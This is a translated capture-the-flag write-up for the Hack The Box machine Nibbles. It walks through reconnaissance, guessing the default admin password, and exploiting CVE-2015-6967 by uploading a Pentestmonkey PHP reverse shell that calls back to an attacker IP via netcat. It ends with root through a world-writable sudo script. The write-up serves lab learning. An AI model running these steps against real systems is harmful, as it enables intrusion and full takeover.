This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

In this post, we complete the Nibbles write-up. We cover fuzzing, default credentials, exploiting the Arbitrary File Upload vulnerability CVE-2015-6967 and escalating privileges by modifying a script that can be executed through sudo.

Reconnaissance

Port Scanning

We scan the open ports on Nibbles with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ cat Puertos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
File: Puertos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1# Nmap 7.92 scan initiated Mon Jul 25 17:48:56 2022 as: nmap --open -p- -T5 -oG Puertos 10.10.10.75
2Host: 10.10.10.75 () Status: Up
3Host: 10.10.10.75 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
4# Nmap done at Mon Jul 25 17:49:09 2022 -- 1 IP address (1 host up) scanned in 13.05 seconds
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Reconocimiento Puertos

{*} Extrayendo puertos...

La direccion ip es: 10.10.10.75
Los puertos abiertos son: 22,80

Los puertos han sido copiados al portapapeles

We run Nmap’s default scripts against the open ports to gather more information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ cat Objetivos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
File: Objetivos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap -sCV -p 22,80 -oN Objetivos 10.10.10.75
2Nmap scan report for 10.10.10.75
3Host is up (0.043s latency).
4
5PORT STATE SERVICE VERSION
622/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
7 │ | ssh-hostkey:
8 │ | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
9 │ | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
10 │ |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
1180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
12 │ |_http-server-header: Apache/2.4.18 (Ubuntu)
13 │ |_http-title: Site doesn't have a title (text/html).
14 │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Web Reconnaissance

Visiting the web server at http://10.10.10.75/ reveals the following:

Nothing is immediately visible, but the source code contains the following:

1
2
3
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

File Fuzzing

We visit http://10.10.10.75/nibbleblog/ and use wfuzz to search for useful or informative txt and php files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
❯ wfuzz -c --hc 404 -u http://10.10.10.75/nibbleblog/FUZZ.FUZ2Z -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt  -z list,php-txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.75/nibbleblog/FUZZ.FUZ2Z
Total requests: 441120

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000007: 200 60 L 168 W 2985 Ch "# - php"
000000019: 200 60 L 168 W 2985 Ch "# - php"
000000015: 200 60 L 168 W 2985 Ch "# or send a letter to Creative Commons, 171 Second Street, - php"
000000001: 200 60 L 168 W 2985 Ch "# directory-list-2.3-medium.txt - php"
000000018: 200 60 L 168 W 2985 Ch "# Suite 300, San Francisco, California, 94105, USA. - txt"
000000016: 200 60 L 168 W 2985 Ch "# or send a letter to Creative Commons, 171 Second Street, - txt"
000000021: 200 60 L 168 W 2985 Ch "# Priority ordered case-sensitive list, where entries were found - php"
000000017: 200 60 L 168 W 2985 Ch "# Suite 300, San Francisco, California, 94105, USA. - php"
000000003: 200 60 L 168 W 2985 Ch "# - php"
000000022: 200 60 L 168 W 2985 Ch "# Priority ordered case-sensitive list, where entries were found - txt"
000000014: 200 60 L 168 W 2985 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - txt"
000000020: 200 60 L 168 W 2985 Ch "# - txt"
000000009: 200 60 L 168 W 2985 Ch "# This work is licensed under the Creative Commons - php"
000000013: 200 60 L 168 W 2985 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - php"
000000012: 200 60 L 168 W 2985 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - txt"
000000011: 200 60 L 168 W 2985 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - php"
000000004: 200 60 L 168 W 2985 Ch "# - txt"
000000008: 200 60 L 168 W 2985 Ch "# - txt"
000000010: 200 60 L 168 W 2985 Ch "# This work is licensed under the Creative Commons - txt"
000000002: 200 60 L 168 W 2985 Ch "# directory-list-2.3-medium.txt - txt"
000000006: 200 60 L 168 W 2985 Ch "# Copyright 2007 James Fisher - txt"
000000005: 200 60 L 168 W 2985 Ch "# Copyright 2007 James Fisher - php"
000000023: 200 60 L 168 W 2985 Ch "# on at least 2 different hosts - php"
000000025: 200 60 L 168 W 2985 Ch "# - php"
000000029: 200 60 L 168 W 2985 Ch "index - php"
000000027: 403 11 L 32 W 301 Ch "php"
000000024: 200 60 L 168 W 2985 Ch "# on at least 2 different hosts - txt"
000000026: 200 60 L 168 W 2985 Ch "# - txt"
000000085: 200 10 L 13 W 402 Ch "sitemap - php"
000000251: 200 7 L 15 W 302 Ch "feed - php"
000000517: 200 26 L 96 W 1401 Ch "admin - php"
000001429: 200 0 L 11 W 78 Ch "install - php"
000001587: 200 87 L 174 W 1621 Ch "update - php"
000006590: 200 675 L 5644 W 35148 Ch "LICENSE - txt"
000035634: 200 26 L 187 W 1272 Ch "COPYRIGHT - txt"

Two files are particularly interesting: update.php and admin.php.

Exploitation

Update.Php

This PHP file reveals the version of nibbleblog in use.

Admin.Php

This file displays a login panel protected against brute force: the page blocks us after several attempts, so finding valid credentials is more efficient.

Valid Credentials

Username

Because directory listing is enabled, browsing the directories reveals an xml file containing the valid user admin at http://10.10.10.75/nibbleblog/content/private/users.xml.

1
2
3
4
5
6
7
8
9
10
11
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">0</session_fail_count>
<session_date type="integer">1514544131</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
</users>

Password

While trying default passwords for the admin account, I tested nibbles and… we are in!

Initial Access

With valid credentials and Nibbleblog 4.0.3, we can exploit this vulnerability. This version does not sanitise the extensions of files uploaded through the My Image plugin:

1 - Download and modify the malicious PHP file that will establish our reverse shell. It is available from Pentestmonkey:

1
2
49   │ $ip = '10.10.16.4';  // CHANGE THIS
50 │ $port = 1234; // CHANGE THIS

2 - Visit http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image and upload the reverse shell, ignoring the warnings.

3 - Start a netcat listener on the selected port:

1
2
nc -lvnp 1234
listening on [any] 1234 ...

4 - Use curl against the following location to execute the malicious file:

1
curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

5 - Receive the reverse shell:

1
2
3
4
5
6
7
8
9
❯ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.75] 59992
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
14:13:20 up 2:35, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$

6 - Make the shell more interactive:

1
2
3
4
5
6
7
8
9
10
$ script /dev/null -c bash 
Script started, file is /dev/null
nibbler@Nibbles:/$ ^Z
[1] + 7276 suspended nc -lvnp 1234
stty raw -echo;fg
[1] + 7276 continued nc -lvnp 1234
reset xterm
nibbler@Nibbles:/$ export SHELL=/bin/bash
nibbler@Nibbles:/$ export TERM=xterm
nibbler@Nibbles:/$ stty cols 207 rows 47

Privilege Escalation

We move to our user’s home directory, /home/nibbler:

1
2
nibbler@Nibbles:/home/nibbler$ ls
personal.zip user.txt

1 - Extract personal.zip:

1
2
3
4
5
nibbler@Nibbles:/home/nibbler$ unzip personal.zip 
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh

2 - The archive contains a script named monitor.sh with permissions set to 777:

1
2
3
4
5
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh

3 - Running sudo -l reveals that we can execute monitor.sh as root.

1
2
3
4
5
6
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

4 - We can now escalate privileges by modifying the script to spawn a shell and then executing it as root:

1
2
3
4
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat ./monitor.sh 
#!/bin/bash

/bin/bash

5 - Execute it with root privileges:

1
2
3
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh 
root@Nibbles:/home/nibbler/personal/stuff# whoami
root

We are root!

Flags

User.Txt

1
2
root@Nibbles:/home/nibbler# cat user.txt 
5f75xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Root.Txt

1
2
root@Nibbles:/# cat /root/root.txt 
17acxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Knowledge Gained

The Nibbles machine teaches us the following:

  • Port reconnaissance with nmap.
  • Web file fuzzing with wfuzz.
  • Exploiting an Arbitrary File Upload vulnerability.
  • Privilege escalation through sudo.

Credits and References

Machine author: mrb3n. Thank you for creating Nibbles and contributing it to the community.